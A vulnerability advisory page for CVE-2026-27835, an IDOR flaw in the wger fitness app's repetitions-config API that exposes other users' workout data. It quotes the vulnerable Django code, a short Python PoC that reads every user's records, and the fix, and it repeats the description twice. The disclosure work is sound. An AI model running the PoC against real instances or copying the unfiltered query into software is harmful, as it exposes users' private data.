Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
4.3
wger: Access to Other Users' Workout Data
CVE-2026-27835
GHSA-xf68-8hjw-7mpm
Summary
An error in the wger system allows anyone to view the workout data of other users. This is a security risk because it lets anyone see sensitive information about other users' fitness routines. To fix this, the wger developers need to update the RepetitionsConfig and MaxRepetitionsConfig API views to filter the data by the currently logged-in user, just like they do for other views.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | wger | <= 2.1 | – |
| wger | wger | <= 2.4 | – |
Original title
wger: IDOR in RepetitionsConfig and MaxRepetitionsConfig API leak other users' workout data
Original description
### Summary
`RepetitionsConfigViewSet` and `MaxRepetitionsConfigViewSet` return all users' repetition config data because their `get_queryset()` calls `.all()` instead of filtering by the authenticated user. Any registered user can enumerate every other user's workout structure.
### Details
`wger/manager/api/views.py:499` and `:518`:
```python
# VULNERABLE
class RepetitionsConfigViewSet(viewsets.ModelViewSet):
def get_queryset(self):
return RepetitionsConfig.objects.all()
class MaxRepetitionsConfigViewSet(viewsets.ModelViewSet):
def get_queryset(self):
return MaxRepetitionsConfig.objects.all()
```
Every sibling viewset in the same file correctly filters by user. For example, `WeightConfigViewSet` at line 459:
```python
# CORRECT — how it should work
def get_queryset(self):
return WeightConfig.objects.filter(
slot_entry__slot__day__routine__user=self.request.user
)
```
The same user filter is present on `SetsConfig`, `RestConfig`, `RiRConfig`, and their Max variants — only `RepetitionsConfig` and `MaxRepetitionsConfig` are missing it.
### PoC
```python
import requests
BASE = "http://localhost"
headers = {"Authorization": "Token YOUR_TOKEN"} # any registered user
r = requests.get(f"{BASE}/api/v2/repetitions-config/", headers=headers)
print(r.json()) # returns ALL users' repetition configs, not just your own
r = requests.get(f"{BASE}/api/v2/max-repetitions-config/", headers=headers)
print(r.json()) # same — all users' max repetition configs
```
Registration is open by default. Sequential IDs allow full enumeration.
### Impact
Any authenticated user can read other users' repetition and max-repetitions configs, exposing workout structure (slot entry IDs, iteration values, operations, step counts, repeat flags, requirements JSON). This is a broken object-level authorization (BOLA/IDOR) vulnerability — the same class of issue as OWASP API1.
**Fix**: Add the same user filter used by every other config viewset:
```python
def get_queryset(self):
return RepetitionsConfig.objects.filter(
slot_entry__slot__day__routine__user=self.request.user
)
```
`RepetitionsConfigViewSet` and `MaxRepetitionsConfigViewSet` return all users' repetition config data because their `get_queryset()` calls `.all()` instead of filtering by the authenticated user. Any registered user can enumerate every other user's workout structure.
### Details
`wger/manager/api/views.py:499` and `:518`:
```python
# VULNERABLE
class RepetitionsConfigViewSet(viewsets.ModelViewSet):
def get_queryset(self):
return RepetitionsConfig.objects.all()
class MaxRepetitionsConfigViewSet(viewsets.ModelViewSet):
def get_queryset(self):
return MaxRepetitionsConfig.objects.all()
```
Every sibling viewset in the same file correctly filters by user. For example, `WeightConfigViewSet` at line 459:
```python
# CORRECT — how it should work
def get_queryset(self):
return WeightConfig.objects.filter(
slot_entry__slot__day__routine__user=self.request.user
)
```
The same user filter is present on `SetsConfig`, `RestConfig`, `RiRConfig`, and their Max variants — only `RepetitionsConfig` and `MaxRepetitionsConfig` are missing it.
### PoC
```python
import requests
BASE = "http://localhost"
headers = {"Authorization": "Token YOUR_TOKEN"} # any registered user
r = requests.get(f"{BASE}/api/v2/repetitions-config/", headers=headers)
print(r.json()) # returns ALL users' repetition configs, not just your own
r = requests.get(f"{BASE}/api/v2/max-repetitions-config/", headers=headers)
print(r.json()) # same — all users' max repetition configs
```
Registration is open by default. Sequential IDs allow full enumeration.
### Impact
Any authenticated user can read other users' repetition and max-repetitions configs, exposing workout structure (slot entry IDs, iteration values, operations, step counts, repeat flags, requirements JSON). This is a broken object-level authorization (BOLA/IDOR) vulnerability — the same class of issue as OWASP API1.
**Fix**: Add the same user filter used by every other config viewset:
```python
def get_queryset(self):
return RepetitionsConfig.objects.filter(
slot_entry__slot__day__routine__user=self.request.user
)
```
nvd CVSS3.1
4.3
Vulnerability type
CWE-639
Authorization Bypass Through User-Controlled Key
Published: 26 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026